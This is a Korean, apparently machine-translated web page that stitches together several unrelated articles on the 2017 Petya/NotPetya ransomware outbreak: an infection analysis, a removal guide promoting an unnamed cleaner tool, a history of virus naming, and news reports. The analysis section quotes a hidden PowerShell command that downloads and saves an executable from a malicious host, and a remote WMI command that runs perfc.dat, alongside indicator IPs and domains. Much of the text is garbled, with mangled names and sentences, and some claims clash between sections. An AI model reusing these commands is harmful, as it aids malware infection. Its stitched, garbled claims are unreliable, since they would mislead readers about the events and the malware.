기계적 인조 인간. 운영 체제. 멀티미디어. 소셜 네트워크. 도구. 코덱. 그래픽 아트
현재 위치: » »

바이러스는 그가 하는 일을 망쳐놓습니다. Misha의 친구 Petya와 유사: 새로운 랜섬웨어 바이러스에 대해 알려진 사항

인터넷에 새로운 랜섬웨어가 유행하고 있습니다. 멀웨어는 각 워크스테이션의 하드 드라이브를 해독하는 데 400달러 미만을 요구하는 수십 개의 대기업 작업을 사실상 차단했습니다.

새로운 전염병으로 인해 생성된 패닉은 정보 혼란을 야기했습니다. 먼저 안티바이러스 분석가가 WannaCry의 재림을 발표한 다음 악성코드가 새로 조립된 Petya 및 Misha 암호화 바이러스의 복합체로 식별되었습니다. 현재로서는 바이러스가 Petya를 기반으로 했다면 크게 수정된 것임이 분명합니다.

배포 모델은 WannaCry와 다소 유사합니다. MS Word의 취약점을 사용하여 사회 공학에 의해 강화된 MS17-010 취약점에 대한 익스플로잇을 사용합니다. 감염은 사용자가 2017년 4월에 게시된 CVE-2017-0199 취약점을 악용하는 이메일 첨부 파일을 열거나 파일을 다운로드한 후 발생합니다. 그리고 네트워크의 다른 컴퓨터로의 배포는 이미 전체 기술 세트에 의해 제공됩니다.

  • 사용자 암호를 훔치거나 활성 세션을 사용하여 다른 네트워크 노드에 액세스(Mimikatz 유틸리티 코드 사용).
  • WannaCry에서 성공적으로 사용된 유명한 EthernalBlue 익스플로잇을 사용하는 SMB(CVE-2017-0144, MS17-010)의 취약점을 통해.

멀웨어는 도난당한 계정을 사용하여 본체를 admin$ 공유에 복사하고 원격 컴퓨터 제어를 위한 합법적인 PsExec 유틸리티를 사용하여 실행합니다.

유명 소프트웨어 개발자 미미카츠, 확인됨그의 수정된 코드가 암호를 추출하는 데 사용되고 있다는 것입니다.

WMI 인터페이스를 사용하여 설치를 시작하는 코드도 Microsoft 블로그에 게시되었습니다.

SMB 벡터를 통한 감염은 WannaCry에서 사용되는 기술과 유사한 CVE-2017-0144 취약점을 사용합니다.

그러나 암호화 모델은 WannaCry에 비해 크게 변경되었습니다. 컴퓨터에 침투한 이 바이러스는 시스템의 MBR(마스터 부트 레코드)을 감염시키고 마스터 파일 테이블을 포함한 하드 디스크의 처음 몇 블록을 암호화하여 개별 파일뿐만 아니라 사용자의 전체 하드 디스크에 액세스할 수 없도록 만듭니다. 랜섬웨어 바이러스가 일반적으로 하는 것처럼.

랜섬웨어에 몸값을 지불하는 것은 윤리적인 이유뿐만 아니라 확실히 가치가 없습니다. 바이러스 분석가는 몸값을 지불한 후 파일을 해독하는 것이 기본적으로 불가능하다는 결론에 도달했습니다. 이 기능은 단순히 악성 코드에 포함되어 있지 않습니다. 사실 이것은 랜섬웨어의 유행이 아니라 데이터를 파괴하는 와이퍼 바이러스의 유행입니다.

러시아 언론 보도에 따르면 Rosneft 회사는 가장 큰 문제에 직면했으며 주요 회사 웹 사이트와 Bashneft 웹 사이트는 오랫동안 비활성화되었습니다.

프랑스, 스페인, 러시아 및 CIS 국가에서 대량 감염이 기록되었습니다. 우크라이나에서는 수십 개의 국가 및 상업 조직이 바이러스의 영향을 받았습니다.

누가 필요합니까?

복구 메커니즘이 코드에 내장되어 있지 않기 때문에 공격자에게 세 가지 다른 동기가 있습니다. 그들은 누군가의 특정 데이터에 대한 표적 파괴를 대규모 전염병으로 위장하고 싶었거나, 처음에는 아무 것도 복원할 생각이 없었던 돈을 벌고 싶었습니다. 가장 가능성이 낮은 옵션은 사이버 기물 파손입니다. 바이러스는 심각한 제품이며 돈을 가져오는 데 사용하는 것이 더 현명할 것입니다. 1990년대에는 명예훼손을 위해 시스템을 깨는 것이 유행이었던 1990년대에 반달족이 발생했지만 지금은 극히 드물다.

결과적으로 지난 2개월 동안 전염병의 주요 수혜자는 분명히 EthernalBlue 익스플로잇을 배포한 The Shadow Brokers 그룹이었습니다. 갈취자들은 전염병으로 인한 피해액보다 몇 배나 적은 금액이 아닌 비교적 적은 양의 돈을 모았습니다. 전염병은 NSA 아카이브에서 나머지 익스플로잇에 대한 정보를 판매할 준비가 되었다고 주장하는 Shadow Brokers에게 훌륭한 광고가 되었습니다. 결국 EthernalBlue는 2016년 8월 Secret Service에서 도난당한 수십 개의 익스플로잇 중 하나일 뿐입니다.

공격 메커니즘

공격자는 Windows 워크스테이션을 감염시키는 파일이나 링크를 보낼 수 있습니다(전염병의 초기 단계에서 이들은 Petya.apx, myguy.exe, myguy.xls, Order-[모든 날짜].doc) 파일입니다. 예를 들어 Order-[any date].doc 파일을 열 때 서버 84.200.16.242는 포트 80에서 액세스되고 xls가 로드됩니다.

powershell.exe -WindowStyle 숨김(New-Object System.Net.WebClient).DownloadFile("h11p://french-cooking.com/myguy.exe", "%APPDATA%\10807.exe");"(PID: [프로세스 ID], 추가 컨텍스트: (System.Net.WebClient).DownloadFile("h11p://french-cooking.com/myguy.exe", "%APPDATA%\[random number].exe") ;)

그런 다음 멀웨어는 제어 서버일 가능성이 있는 서버 111.90.139.247:80 및 COFFEINOFFICE.XYZ:80에 연결을 시도합니다.

침해 표시기는 파일의 존재입니다.

C:\Windows\perfc.dat
C:\myguy.xls.hta

호스트에 연결한 후 네트워크의 다른 Windows 시스템이 검색되고 포트 tcp:135, tcp:139, tcp:445, tcp:1024-를 통해 MS17-010(WannaCry에서 사용하는 것과 동일한)에 설명된 취약점을 사용하여 확산됩니다. 1035.

다음 명령을 실행하여 전파할 수도 있습니다.

원격 WMI, "프로세스 호출 생성 "C:\\Windows\\System32\\rundll32.exe \"C:\\Windows\\perfc.dat\" #1"


감염 확산 다이어그램은 blog.kryptoslogic.com에서 가져왔습니다.

감염을 피하는 방법?

French-cooking.com:80
84.200.16.242:80
111.90.139.247:80
커피오피스.XYZ:80

Peter.apx, myguy.exe, myguy.xls, 주문-[모든 날짜].doc

3. 패치 설치

4. MS17-010에 대한 익스플로잇을 차단하도록 IPS 구성

5. 아직 감염되지 않은 호스트를 보호하기 위해 확장자가 없는 c:\windows\perfc 파일을 생성할 수 있습니다. 이러한 노드의 감염은 발생하지 않습니다.

몇 달 전에 우리와 다른 IT 보안 전문가들이 새로운 악성코드를 발견했습니다. Petya(Win32.Trojan-Ransom.Petya.A). 고전적인 의미에서 이 바이러스는 랜섬웨어가 아니며 단순히 특정 유형의 파일에 대한 액세스를 차단하고 몸값을 요구했습니다. 이 바이러스는 하드 드라이브의 부트 레코드를 수정하고 PC를 강제로 재부팅했으며 "데이터가 암호화되어 있습니다. 암호 해독을 위해 돈을 쫓으십시오"라는 메시지를 표시했습니다. 일반적으로 파일이 실제로 암호화되지 않았다는 점을 제외하고는 랜섬웨어 바이러스의 표준 체계입니다. 대부분의 인기 있는 바이러스 백신은 릴리스 후 몇 주 이내에 Win32.Trojan-Ransom.Petya.A를 식별하고 제거하기 시작했습니다. 또한 수동 제거 지침이 있습니다. Petya가 고전적인 랜섬웨어가 아니라고 생각하는 이유는 무엇입니까? 이 바이러스는 마스터 부트 레코드를 변경하여 OS 부팅을 방지하고 마스터 파일 테이블(마스터 파일 테이블)도 암호화합니다. 파일 자체를 암호화하지 않습니다.

그러나 더 정교한 바이러스가 몇 주 전에 나타났습니다. 미샤, 분명히 같은 사기꾼이 작성했습니다. 이 바이러스는 ENCRYPTS 파일을 생성하고 암호 해독을 위해 500 - 875$를 지불해야 합니다(다른 버전에서는 1.5 - 1.8 비트코인). "암호 해독" 및 이에 대한 지불 지침은 YOUR_FILES_ARE_ENCRYPTED.HTML 및 YOUR_FILES_ARE_ENCRYPTED.TXT 파일에 저장됩니다.

Mischa 바이러스 - YOUR_FILES_ARE_ENCRYPTED.HTML 파일의 내용

이제 실제로 해커는 Petya와 Mischa라는 두 가지 맬웨어로 사용자의 컴퓨터를 감염시킵니다. 첫 번째는 시스템에서 관리자 권한이 필요합니다. 즉, 사용자가 Petya에 관리자 권한 부여를 거부하거나 이 악성코드를 수동으로 제거하면 Mischa가 개입합니다. 이 바이러스는 관리자 권한이 필요하지 않으며 고전적인 랜섬웨어이며 마스터 부트 레코드와 피해자의 하드 드라이브에 있는 파일 테이블을 변경하지 않고 강력한 AES 알고리즘을 사용하여 파일을 실제로 암호화합니다.

Mischa 악성코드는 표준 파일 형식(동영상, 사진, 프레젠테이션, 문서)뿐만 아니라 .exe 파일도 암호화합니다. 이 바이러스는 \Windows, \$Recycle.Bin, \Microsoft, \Mozilla Firefox, \Opera, \Internet Explorer, \Temp, \Local, \LocalLow 및 \Chrome 디렉터리에만 영향을 미치지 않습니다.

감염은 주로 이메일을 통해 발생하며, 바이러스 설치 프로그램인 첨부 파일과 함께 편지가 도착합니다. 세무서, 회계사의 서신, 동봉된 영수증 및 구매 영수증 등으로 암호화할 수 있습니다. 이러한 문자의 파일 확장자에 주의하십시오. 실행 파일(.exe)인 경우 Petya\Mischa 바이러스가 포함된 컨테이너일 가능성이 높습니다. 그리고 악성 코드의 수정이 최신이면 바이러스 백신이 반응하지 않을 수 있습니다.

2017년 6월 30일 업데이트: 6월 27일, Petya 바이러스의 변형된 버전 (페티아.A)우크라이나에서 대규모로 사용자를 공격했습니다. 이 공격의 영향은 엄청났고 경제적 피해는 아직 계산되지 않았습니다. 어느 날 수십 개의 은행, 소매 체인, 정부 기관 및 다양한 형태의 소유 기업의 업무가 마비되었습니다. 바이러스는 주로 이 소프트웨어의 최신 자동 업데이트와 함께 우크라이나 MeDoc 회계 시스템의 취약점을 통해 퍼졌습니다. 또한 이 바이러스는 러시아, 스페인, 영국, 프랑스, ​​리투아니아와 같은 국가에도 영향을 미쳤습니다.

자동 청소기로 Petya 및 Mischa 바이러스 제거

일반적으로 맬웨어와 특히 랜섬웨어를 처리하는 매우 효과적인 방법입니다. 입증된 보호 복합체를 사용하면 바이러스 구성 요소를 완벽하게 탐지하고 클릭 한 번으로 완전히 제거할 수 있습니다. 우리는 감염 제거와 PC의 파일 복원이라는 두 가지 다른 프로세스에 대해 이야기하고 있습니다. 그러나 도움이 되는 다른 컴퓨터 트로이 목마의 도입에 대한 정보가 있으므로 위협 요소를 제거해야 합니다.

  1. . 소프트웨어를 실행한 후 버튼을 클릭합니다. 컴퓨터 스캔 시작(스캔 시작).
  2. 설치된 소프트웨어는 검사 중에 탐지된 위협에 대한 보고서를 제공합니다. 발견된 모든 위협을 제거하려면 옵션을 선택하십시오. 위협 수정(위협 제거). 문제의 악성 코드는 완전히 제거됩니다.

암호화된 파일에 대한 액세스 복원

언급한 바와 같이 Mischa 랜섬웨어는 강력한 암호화 알고리즘으로 파일을 잠급니다. 전대미문의 몸값(최대 1,000달러) 지불을 고려하지 않는 한 마법의 지팡이로 암호화된 데이터를 복원할 수 없습니다. 그러나 일부 방법은 실제로 중요한 데이터를 복구하는 데 도움이 되는 생명의 은인이 될 수 있습니다. 아래에서 그들과 친해질 수 있습니다.

자동 파일 복구 프로그램(복호화기)

매우 특이한 상황이 알려져 있습니다. 이 감염은 암호화되지 않은 형식의 원본 파일을 지웁니다. 따라서 강탈적인 암호화 프로세스는 사본을 대상으로 합니다. 따라서 제거의 신뢰성이 보장되는 경우에도 삭제된 개체의 복구와 같은 소프트웨어 도구가 가능합니다. 파일 복구 절차에 의존하는 것이 좋습니다. 그 효과는 의심의 여지가 없습니다.

볼륨 섀도 복사본

이 접근 방식은 각 복원 지점에서 반복되는 Windows 기반 파일 백업 절차를 기반으로 합니다. 이 방법이 작동하기 위한 중요한 조건: 감염 전에 "시스템 복원" 기능이 활성화되어야 합니다. 그러나 복원 지점 이후의 파일 변경 사항은 파일의 복원된 버전에 반영되지 않습니다.

지원

이것은 모든 비매수 방법 중 최고입니다. 랜섬웨어가 컴퓨터를 공격하기 전에 데이터를 외부 서버에 백업하는 절차를 사용한 경우 암호화된 파일을 복원하려면 적절한 인터페이스에 들어가 필요한 파일을 선택한 다음 백업에서 데이터 복구 메커니즘을 시작하기만 하면 됩니다. 작업을 수행하기 전에 랜섬웨어가 완전히 제거되었는지 확인해야 합니다.

잔여 Petya 및 Mischa 랜섬웨어 구성 요소 확인

수동 청소는 운영 체제 또는 레지스트리 항목의 숨겨진 개체 형태로 제거를 피할 수 있는 랜섬웨어 조각이 누락될 위험이 있습니다. 개별 악성 요소가 부분적으로 보존될 위험을 제거하려면 맬웨어에 특화된 안정적인 보안 소프트웨어 패키지를 사용하여 컴퓨터를 검사하십시오.

맬웨어 이름 지정의 역사에 대한 간략한 여행.

책갈피로

Petya.A 바이러스 로고

6월 27일 최소 80개의 러시아 및 우크라이나 회사가 Petya.A 바이러스에 의해 공격을 받았습니다. 이 프로그램은 부서와 기업의 컴퓨터에서 정보를 차단하고 잘 알려진 랜섬웨어 바이러스와 마찬가지로 사용자에게 비트코인을 요구했습니다.

악성 프로그램의 이름은 일반적으로 바이러스 백신 회사의 직원이 지정합니다. 컴퓨터 감염 외에도 미디어 전염병을 일으키는 암호 작성자, 강탈자, 파괴자 및 도둑은 예외입니다.

그러나 Petya.A 바이러스는 새로운 세대입니다. 그가 자신을 소개하는 이름은 다크넷 시장에서 인지도를 높이고 인기를 높이기 위한 개발자 마케팅 전략의 일부입니다.

하위문화 현상

컴퓨터가 거의 없고 모든 컴퓨터에서 멀리 떨어져 있는 그 시절에는 자체 전파 프로그램(아직 바이러스가 아님)이 이미 존재했습니다. 그 중 첫 번째는 농담으로 사용자에게 인사하고 그를 잡아서 삭제하겠다고 제안하는 것이었습니다. 이어 쿠키몬스터는 '쿠키'라는 단어를 입력해 '쿠키 줘'를 요구했다.

초기 맬웨어에는 유머 감각도 있었지만 항상 이름에는 없었습니다. 따라서 Apple-2 컴퓨터용으로 설계된 Richard Skrant는 컴퓨터가 50번 다운로드될 때마다 피해자에게 운율을 읽어주고, 종종 코드에 숨겨져 있고 표시되지 않는 바이러스의 이름은 그 시대의 괴짜들. 금속 밴드, 대중 문학 및 탁상용 롤 플레잉 게임의 이름과 관련될 수 있습니다.

20 세기 말에 바이러스 제작자는 많이 숨기지 않았습니다. 또한 프로그램이 통제 불능 상태가되면 종종 프로그램으로 인한 피해를 제거하는 데 참여하려고했습니다. Y-Combinator 비즈니스 인큐베이터의 미래 공동 설립자가 만든 파키스탄과 파괴적인 것도 마찬가지였습니다.

시적 능력은 Evgeny Kaspersky가 1992년 저서 "MS-DOS의 컴퓨터 바이러스"에서 언급한 러시아 바이러스 중 하나에서도 입증되었습니다. Condom-1581 프로그램은 때때로 희생자가 인간 쓰레기로 세계의 바다를 막는 문제에 전념하는 것을 보여주었습니다.

지리 및 달력

1987년 이스라엘 바이러스라고도 알려진 예루살렘 바이러스는 최초 발견 장소의 이름을 따서 명명되었으며, 블랙프라이데이라는 별명은 매월 13일이 되면 실행 파일을 활성화하고 삭제한다는 사실에 기인합니다. 금요일.

달력 원리에 따르면 미켈란젤로 바이러스도 명명되어 1992년 봄에 언론 공황을 일으켰습니다. 그런 다음 나중에 가장 성가신 바이러스 백신 중 하나로 유명해진 John McAfee는 사이버 보안, 언론인 및 대중에 대한 시드니 회의에서 다음과 같이 말했습니다. "3월 6일에 감염된 시스템을 부팅하면 하드 드라이브의 모든 데이터가 손상됩니다." 그리고 미켈란젤로는? 3월 6일, 이탈리아 예술가는 생일을 맞았습니다. 그러나 McAfee가 예측한 공포는 결국 지나치게 과장되었습니다.

기능

바이러스의 능력과 그 특이성은 종종 이름의 기초가 됩니다. 1990년에 최초의 다형성 바이러스 중 하나가 카멜레온이라는 이름을 얻었고, 그 존재를 숨길 수 있는 광범위한 능력을 가진(따라서 스텔스 바이러스 범주에 속함) 카멜레온의 이름은 제왕의 영웅을 암시하는 프로도(Frodo)로 명명되었습니다. 반지와 반지 주위 사람들의 눈에서 숨어 있습니다. 그리고 예를 들어 1994년의 OneHalf 바이러스는 공격받은 장치의 디스크 절반만 감염시켜 공격성을 보였다는 점에서 그 이름을 얻었습니다.

서비스 제목

대부분의 바이러스는 오랫동안 실험실에서 이름이 지정되어 분석에 의해 분해됩니다.

일반적으로 이들은 바이러스의 범주, 공격하는 시스템 및 바이러스와 함께 수행하는 작업(예: Win32.HLLP.DeTroie)을 설명하는 지루한 서수 이름과 일반적인 "패밀리" 이름입니다. 그러나 때때로 개발자가 남긴 힌트가 프로그램 코드에서 감지될 수 있을 때 바이러스는 약간의 개성을 갖습니다. 예를 들어 MyDoom 및 KooKoo 바이러스가 이러한 방식으로 나타났습니다.

그러나 이 규칙이 항상 작동하는 것은 아닙니다. 예를 들어, 이란에서 우라늄 농축 원심분리기를 중단시킨 Stuxnet 바이러스는 Myrtus가 되지 않았지만 코드에서 이 단어("머틀")는 거의 직접적인 암시였습니다. 개발에 이스라엘 특별 서비스의 참여. 이 경우 이미 일반 대중에게 알려진 바이러스 탐지의 첫 번째 단계에서 주어진 이름이 이겼습니다.

작업

연구에 많은 관심과 노력이 필요한 바이러스는 바이러스 백신 회사로부터 말하고 쓰기 쉬운 아름다운 이름을 받는 경우가 종종 있습니다. 이것은 Red October, 외교 서신 및 국제 관계에 영향을 미칠 수 있는 데이터, IceFog에서 발생했습니다. , 대규모 산업 스파이.

파일 확장자

또 다른 인기 있는 이름 지정 방법은 바이러스가 감염된 파일에 할당하는 확장명을 사용하는 것입니다. 따라서 "군사" Duqu 바이러스 중 하나는 Star Wars의 Dooku 백작 때문이 아니라 그가 만든 파일을 표시하는 ~DQ 접두사 때문에 그렇게 명명되었습니다.

올 봄에 유행한 WannaCry 바이러스도 .wncry 확장자로 암호화된 데이터를 표시하는 이름을 얻었습니다.

바이러스의 이전 이름인 Wanna Decrypt0r는 주목받지 못했습니다. 모든 사람이 "0"을 "o"로 지정하는 것을 귀찮게 한 것은 아닙니다.

“당신은 Petya 랜섬웨어의 피해자입니다”

이것이 오늘날 가장 많이 언급되는 맬웨어가 공격받은 컴퓨터의 파일 암호화를 완료한 것처럼 보이는 방식입니다. Petya A. 바이러스는 인식할 수 있는 이름뿐만 아니라 해적 해골과 이미지의 형태의 로고와 전체 마케팅 프로모션을 가지고 있습니다. 그의 형제 "Misha"와 함께 아직 발견되지 않은 이 바이러스는 바로 이에 대해 분석가의 관심을 끌었습니다.

서브컬처 현상에서 이런 종류의 '해킹'을 위해서는 상당한 기술적 지식이 요구되는 시대를 거치면서 바이러스는 사이버 고프 스톱의 무기가 되었습니다. 이제 그들은 시장의 규칙에 따라 플레이해야 합니다. 누가 더 많은 관심을 받는지 그는 개발자에게 큰 이익을 가져다줍니다.

6월 27일 화요일 우크라이나와 러시아 기업은 대규모 바이러스 공격을 보고했습니다. 기업의 컴퓨터에 몸값을 요구하는 메시지가 표시되었습니다. 해커로 인해 다시 한 번 피해를 입은 사람과 중요한 데이터의 도난으로부터 자신을 보호하는 방법을 알아 냈습니다.

피터, 충분해

에너지 부문이 가장 먼저 공격을 받았습니다. 우크라이나 회사 Ukrenergo와 Kyivenergo는 바이러스에 대해 불평했습니다. 공격자는 컴퓨터 시스템을 마비시켰지만 발전소의 안정성에는 영향을 미치지 않았습니다.

우크라이나인들은 네트워크에 감염의 결과를 게시하기 시작했습니다. 수많은 사진으로 판단할 때 컴퓨터가 랜섬웨어 바이러스에 의해 공격을 받았습니다. 영향을 받는 장치의 화면에는 모든 데이터가 암호화되었으며 장치 소유자는 비트코인으로 300달러의 몸값을 지불해야 한다는 메시지가 표시되었습니다. 동시에 해커는 활동이 없을 경우 정보가 어떻게 될지 알려주지 않았으며 WannaCry 바이러스 공격의 경우와 같이 데이터가 파괴될 때까지 카운트다운 타이머도 설정하지 않았습니다.

우크라이나 국립 은행(NBU)은 바이러스로 인해 여러 은행의 업무가 부분적으로 마비되었다고 보고했습니다. 우크라이나 언론에 따르면 공격은 Oschadbank, Ukrsotsbank, Ukrgasbank 및 PrivatBank의 사무실에 영향을 미쳤습니다.

Ukrtelecom, Boryspil 공항, Ukrposhta, Novaya Poshta, Kievvodokanal 및 Kyiv Metro의 컴퓨터 네트워크가 감염되었습니다. 또한 바이러스는 우크라이나 이동 통신 사업자인 Kyivstar, Vodafone 및 Lifecell을 강타했습니다.

나중에 우크라이나 언론은 Petya.A 멀웨어임을 분명히 했습니다. 이것은 해커를 위한 일반적인 계획에 따라 배포됩니다. 피싱 이메일은 피싱 이메일이 포함된 링크를 열도록 요청하는 더미에서 피해자에게 전송됩니다. 그 후, 바이러스는 컴퓨터에 침투하여 파일을 암호화하고 암호 해독을 위해 몸값을 요구합니다.

해커는 돈을 이체해야 하는 비트코인 ​​지갑의 번호를 표시했습니다. 거래에 대한 정보로 판단하면 피해자는 이미 1.2 비트코인(168,000 루블 이상)을 전송했습니다.

Group-IB의 정보 보안 전문가에 따르면 80개 이상의 회사가 공격의 영향을 받았습니다. 범죄 연구소장은 이 바이러스가 WannaCry와 관련이 없다고 언급했습니다. 문제를 해결하기 위해 그는 TCP 포트 1024–1035, 135 및 445를 닫을 것을 권고했습니다.

누가 유죄인가

그녀는 공격이 러시아 또는 Donbass의 영토에서 조직되었다고 가정하기 위해 서둘렀지만 어떤 증거도 제공하지 않았습니다. 우크라이나 인프라 장관 봤다그는 "바이러스"라는 단어를 암시하고 자신의 페이스북에 "RUS로 끝나는 것은 우연이 아니다"라고 적으며 윙크하는 이모티콘으로 추측했다.

한편, 그는 공격이 Petya와 Mischa로 알려진 기존의 "맬웨어"와 관련이 없다고 주장합니다. 보안 당국자들은 새로운 물결이 우크라이나와 러시아 기업뿐만 아니라 다른 국가의 기업에도 영향을 미쳤다고 주장합니다.

그럼에도 불구하고 인터페이스 면에서 현재 "맬웨어"는 몇 년 전 피싱 링크를 통해 유포된 잘 알려진 Petya 바이러스와 유사합니다. 12월 말, Petya 및 Mischa 랜섬웨어를 만든 알 수 없는 해커가 이전 랜섬웨어 버전과 동일한 GoldenEye라는 바이러스가 포함된 감염된 이메일을 보내기 시작했습니다.

인사 부서에서 자주 받는 일반 서신의 첨부 파일에는 더미 후보자에 대한 정보가 포함되어 있었습니다. 파일 중 하나에서 실제로 요약을 찾을 수 있고 다음에서 바이러스 설치 프로그램을 찾을 수 있습니다. 그런 다음 공격자의 주요 대상은 독일 회사였습니다. 낮에는 독일 회사의 160명 이상의 직원이 함정에 빠졌습니다.

해커를 계산하는 것은 불가능했지만 그가 본드의 팬이라는 것은 분명합니다. Petya 및 Mischa 프로그램은 음모에 따르면 전자기 무기 인 영화 "Golden Eye"의 러시아 위성 "Petya"와 "Misha"의 이름입니다.

Petya의 원래 버전은 2016년 4월에 활발히 배포되기 시작했습니다. 그녀는 능숙하게 컴퓨터로 위장하고 합법적인 프로그램으로 가장하여 확장된 관리자 권한을 요청했습니다. 활성화 후 프로그램은 매우 공격적으로 행동했습니다. 몸값 지불에 대한 엄격한 기한을 설정하고 1.3비트코인을 요구했으며 기한이 지나면 금전적 보상을 두 배로 늘렸습니다.

사실, Twitter 사용자 중 한 명이 랜섬웨어의 약점을 빠르게 발견하고 7초 만에 키를 생성하는 간단한 프로그램을 만들어 컴퓨터 잠금을 해제하고 결과 없이 모든 데이터의 암호를 해독할 수 있도록 했습니다.

처음이 아니라

5월 중순, 전 세계 컴퓨터가 WannaCry라고도 알려진 유사한 랜섬웨어 WannaCrypt0r 2.0의 공격을 받았습니다. 불과 몇 시간 만에 70개 이상의 국가에서 수십만 대의 Windows 기반 장치를 마비시켰습니다. 희생자 중에는 러시아 법 집행 기관, 은행 및 이동 통신 사업자도 있었습니다. 피해자의 컴퓨터에 침입한 바이러스는 하드 드라이브를 암호화하고 사이버 범죄자에게 300달러의 비트코인을 보낼 것을 요구했습니다. 반영을 위해 3일을 할당한 후 금액을 두 배로 늘리고 일주일 후에 파일을 영구적으로 암호화했습니다.

그러나 희생자들은 몸값을 전송하는 데 서두르지 않았고 "맬웨어"의 제작자는

이미지 저작권아빠이미지 캡션 전문가들은 새로운 랜섬웨어와 싸우는 것이 워너크라이보다 어렵다고 말합니다.

6월 27일 랜섬웨어는 전 세계 수십 개 기업의 컴퓨터를 차단하고 파일을 암호화했습니다.

우크라이나 기업이 가장 큰 피해를 입은 것으로 보고되었습니다. 이 바이러스는 대기업, 정부 기관 및 기반 시설의 컴퓨터를 감염시켰습니다.

파일을 해독하기 위해 바이러스는 피해자에게 비트코인으로 300달러를 지불해야 합니다.

BBC 러시아어 서비스는 새로운 위협에 대한 주요 질문에 답변합니다.

누가 다쳤어?

바이러스의 확산은 우크라이나에서 시작되었습니다. Boryspil 공항, Ukrenergo의 일부 지역 부서, 체인점, 은행, 미디어 및 통신 회사가 영향을 받았습니다. 우크라이나 정부의 컴퓨터도 꺼졌습니다.

그 후 러시아 기업의 차례가 되었습니다. Rosneft, Bashneft, Mondelez International, Mars, Nivea 등도 바이러스에 희생되었습니다.

바이러스는 어떻게 작동합니까?

전문가들은 아직 새로운 바이러스의 기원에 대해 합의에 이르지 못했습니다. Group-IB와 Positive Technologies는 이를 2016년 Petya 바이러스의 변종으로 보고 있습니다.

Positive Technologies의 정보 보안 위협 대응 책임자인 Elmar Nabigaev는 "이 랜섬웨어는 해커 방식과 유틸리티, 표준 시스템 관리 유틸리티를 모두 사용합니다. 최소한 한 대의 개인용 컴퓨터를 사용합니다."라고 말했습니다. 데이터 암호화."

루마니아 회사 Bitdefender는 Petya와 Misha라는 다른 멀웨어를 연결하는 GoldenEye 바이러스와 더 많은 공통점을 가지고 있습니다. 후자의 장점은 파일을 암호화하기 위해 미래의 피해자로부터 관리자 권한을 요구하지 않고 자체적으로 추출한다는 것입니다.

브라이언 캠벨 Fujitsu와 다른 많은 전문가들은 새로운 바이러스가 미국 국가안보국(National Security Agency)에서 훔친 수정된 EternalBlue 프로그램을 사용한다고 믿고 있습니다.

2017년 4월 해커 The Shadow Brokers에 의해 이 프로그램이 공개된 후 이를 기반으로 생성된 WannaCry 랜섬웨어 바이러스가 전 세계에 퍼졌습니다.

Windows 취약점을 사용하는 이 프로그램은 바이러스가 회사 네트워크 전체의 컴퓨터로 확산되도록 합니다. 원본 Petya는 이력서를 가장한 이메일로 전송되었으며 이력서를 연 컴퓨터에서만 감염될 수 있었습니다.

Kaspersky Lab은 Interfax에 랜섬웨어 바이러스가 이전에 알려진 맬웨어 계열에 속하지 않는다고 말했습니다.

카스퍼스키 랩의 안티바이러스 연구 부서장인 Vyacheslav Zakorzhevsky는 "카스퍼스키 랩의 소프트웨어 제품은 이 악성코드를 UDS:DangeroundObject.Multi.Generic으로 탐지합니다."라고 말했습니다.

일반적으로 새로운 바이러스를 러시아식 이름으로 부르면 여러 악성 프로그램으로 구성되어 있기 때문에 겉보기에는 프랑켄슈타인의 괴물에 가깝다는 점을 염두에 두어야 합니다. 이 바이러스는 2017년 6월 18일에 태어난 것으로 알려져 있습니다.

이미지 캡션 파일의 암호를 해독하고 컴퓨터의 잠금을 해제하려면 바이러스에 $ 300가 필요합니다.

워너크라이보다 낫나요?

2017년 5월 WannaCry가 역사상 가장 대규모의 사이버 공격 상태에 도달하는 데 며칠이 걸렸습니다. 새로운 랜섬웨어가 최신 랜섬웨어를 능가합니까?

공격자는 하루도 채 되지 않아 피해자로부터 2.1비트코인(약 5,000달러)을 받았습니다. WannaCry는 같은 기간에 7개의 비트코인을 수집했습니다.

동시에 Positive Technologies의 Elmar Nabigaev에 따르면 새로운 강탈자와 싸우는 것이 더 어렵습니다.

전문가는 "[Windows의 취약점] 익스플로잇 외에도 이 위협은 특수 해킹 도구를 사용하여 훔친 운영 체제 계정을 사용하여 확산됩니다."라고 말했습니다.

바이러스에 대처하는 방법?

전문가들은 예방 조치로 운영 체제 업데이트를 제시간에 설치하고 이메일로 받은 파일을 확인하는 것이 좋습니다.

고급 관리자는 SMB(서버 메시지 블록) 네트워크 통신 프로토콜을 일시적으로 비활성화하는 것이 좋습니다.

컴퓨터가 감염되면 어떤 경우에도 공격자에게 비용을 지불하지 마십시오. 그들이 돈을 받았을 때 파일을 해독하고 더 많은 것을 요구하지 않을 것이라는 보장은 없습니다.

암호 해독기를 기다리는 일만 남았습니다. WannaCry의 경우 프랑스 회사 Quarkslab의 전문가인 Adrien Guignet이 암호 해독기를 만드는 데 일주일이 걸렸습니다.

최초의 AIDS 랜섬웨어(PC 사이보그)는 생물학자인 Joseph Popp가 1989년에 작성했습니다. 그녀는 디렉토리와 암호화된 파일을 숨기고 $189를 요구했습니다." 라이센스 갱신" 파나마 계좌로 Popp는 플로피 디스크를 사용하여 자신의 아이디어를 일반 우편으로 배포하여 총 약 20,000출발. Popp는 수표를 현금화하려다가 구금되었지만 재판에서 탈출했습니다. 1991년 그는 미쳤다고 선언되었습니다.

표제:
공유하다